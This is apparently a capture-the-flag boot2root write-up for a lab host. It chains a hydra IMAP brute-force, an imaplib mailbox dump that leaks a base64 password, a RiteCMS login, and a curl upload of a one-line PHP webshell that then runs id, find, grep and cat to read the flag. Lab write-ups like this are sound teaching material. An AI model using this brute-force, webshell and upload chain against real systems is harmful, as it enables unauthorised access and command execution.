N
Back to writeup archive
LIGA CTF 2026 (Week 2 Boot2Root)

Chain of Attacks - I

Target exposes IMAP (143), HTTP RiteCMS (8080), and Webmin (9090). Attack path for Part I

Boot2RootMarkdown + PDFHardsolved1 minread·314words
route
/TryN3rr0r/writeups/liga-ctf-2026-week-2-boot2root/chain-of-attacks-i
archive index
8 / 16
read mode
parsed markdown
Writeup loaded.

Chain of Attacks - I

challenge brief
target profile, scoring, and execution stack
verified solve
target
192.168.1.21
category
Boot2Root
points
856
difficulty
Hard
flag format
OWASPKL{xxx}
tools used
nmaphydrapython3imaplibbase64curlgrep
final flag
OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}
reveal and copy from section 5
PDF evidence frame 01

1. Challenge Overview

Target exposes IMAP (143), HTTP RiteCMS (8080), and Webmin (9090). Attack path for Part I:

Brute IMAP for kdjebat, read mailbox for the real password + admin notes.

Log into RiteCMS as kdjebat, upload a PHP webshell.

Read /var/www/local.txt.

2. Initial Reconnaissance

2.1 Port scan

bash1 lines
1nmap -sC -sV -p- -T4 192.168.1.21 -oA coa1_nmap_full
bash4 lines
1PORT     STATE SERVICE         VERSION2143/tcp  open  imap            Dovecot imapd38080/tcp open  http            Apache httpd 2.4.66 ((Ubuntu))49090/tcp open  ssl/zeus-admin?
PDF evidence frame 02

3. Analysis / Forensics Path

3.1 Build the IMAP wordlist

Only IMAP was attackable for initial creds. I used a tiny list of obvious defaults to stay fast and legal (small wordlist first).

bash2 lines
1printf 'admin\npassword\n123456\nkdjebat\nadmin123\n' > imap_small.txt2cat imap_small.txt
bash5 lines
1admin2password31234564kdjebat5admin123

3.2 Brute IMAP for kdjebat

bash1 lines
1hydra -l kdjebat -P imap_small.txt -s 143 -f -t 4 192.168.1.21 imap
bash5 lines
1[DATA] max 4 tasks per 1 server, overall 4 tasks, 5 login tries (l:1/p:5), ~2 tries per task2[DATA] attacking imap://192.168.1.21:143/3[143][imap] host: 192.168.1.21   misc: (null)   login: kdjebat   password: admin4[STATUS] attack finished for 192.168.1.21 (valid pair found)51 of 1 target successfully completed, 1 valid password found
PDF evidence frame 03

3.3 Dump the mailbox

kdjebat:admin only unlocks the mailbox, not the CMS. Dumped both reachable accounts with imaplib.

bash14 lines
1python3 - <<'PY' > imap_mailbox_dump.txt2import imaplib3for user, pw in [("kdjebat","admin"),("profapokalips","admin")]:4    print(f"=== ACCOUNT {user}:{pw} ===")5    M = imaplib.IMAP4("192.168.1.21", 143)6    print("LOGIN:", M.login(user, pw))7    M.select("INBOX")8    typ, data = M.search(None, "ALL")9    for mid in (data[0].split() if data and data[0] else []):10        typ, d = M.fetch(mid, "(RFC822)")11        print(d[0][1].decode(errors="ignore"))12    M.logout()13PY14cat imap_mailbox_dump.txt
bash7 lines
1=== ACCOUNT kdjebat:admin ===2BODY:3Salam bro, aku tukar password. New password (sila decrypt):4YWN0dWFsbHlpZGsxMjNA==5=== ACCOUNT profapokalips:admin ===6SUBJECT: Update deployment   -> http://chain:8080/ritecms7SUBJECT: Pasal username      -> "Aku dah tukar username admin tu. Pakai nama aku sekarang. Password sama je."

3.4 Decode the new password

bash1 lines
1echo 'YWN0dWFsbHlpZGsxMjNA==' | base64 -d
bash1 lines
1actuallyidk123@
PDF evidence frame 04

4. Exploitation / Recovery

4.1 Log into RiteCMS as kdjebat

Mail said the admin user is now kdjebat, password unchanged.

bash1 lines
1curl -s -i -c rite.cookie -d 'username=kdjebat&userpw=actuallyidk123@' -X POST http://192.168.1.21:8080/ritecms/admin.php | head -n 5
bash2 lines
1HTTP/1.1 302 Found2Location: ./

4.2 Upload PHP webshell via file manager

php1 lines
1<?php if(isset($_GET['c'])){system($_GET['c']);} ?>
bash6 lines
1curl -s -i -b rite.cookie \2  -F 'mode=filemanager' -F 'action=upload' -F 'directory=files' \3  -F 'file_name=sh.php' -F 'overwrite_file=true' -F 'upload_mode=1' \4  -F 'upload_file_submit=OK - Upload file' \5  -F 'file=@sh.php;type=application/octet-stream' \6  'http://192.168.1.21:8080/ritecms/admin.php' | head -n 3
bash2 lines
1HTTP/1.1 302 Found2Location: http://192.168.1.21:8080/ritecms/admin.php?mode=filemanager&directory=files

4.3 Locate and read the flag through the webshell

Confirm code execution, hunt for the flag file, then read it.

bash4 lines
1curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=id'2curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=find%20/var/www%20-maxdepth%202%20-name%20%22*.txt%22'3curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=grep%20-Rns%20%22OWASPKL%7B%22%20/var/www%202%3E/dev/null'4curl -s 'http://192.168.1.21:8080/ritecms/files/sh.php?c=cat%20/var/www/local.txt'
bash4 lines
1uid=33(www-data) gid=33(www-data) groups=33(www-data)2/var/www/local.txt3/var/www/local.txt:1:OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}4OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}

> Re-validated live on 2026-05-31 via Kali (192.168.1.10): IMAP brute returned kdjebat:admin, the webshell id returned www-data, find/grep located /var/www/local.txt, and cat returned the flag above.

PDF evidence frame 05

5. Flag

captured flag
OWASPKL{47f1adc2c50c9a61292b05eb444c07eb}

6. Summary of Approach & Key Takeaways

nmap found IMAP + RiteCMS + Webmin.

Built a small default-password list and brute-forced IMAP -> kdjebat:admin.

Mailbox leaked the base64 password actuallyidk123@ and that admin was renamed to kdjebat.

Logged into RiteCMS, uploaded a PHP webshell.

Read /var/www/local.txt.

Mailboxes often hold the next credential; always read mail after an IMAP hit.

A small targeted wordlist beats rockyou for obvious-default services.

PDF evidence frame 06
PDF evidence frame 07
PDF evidence frame 08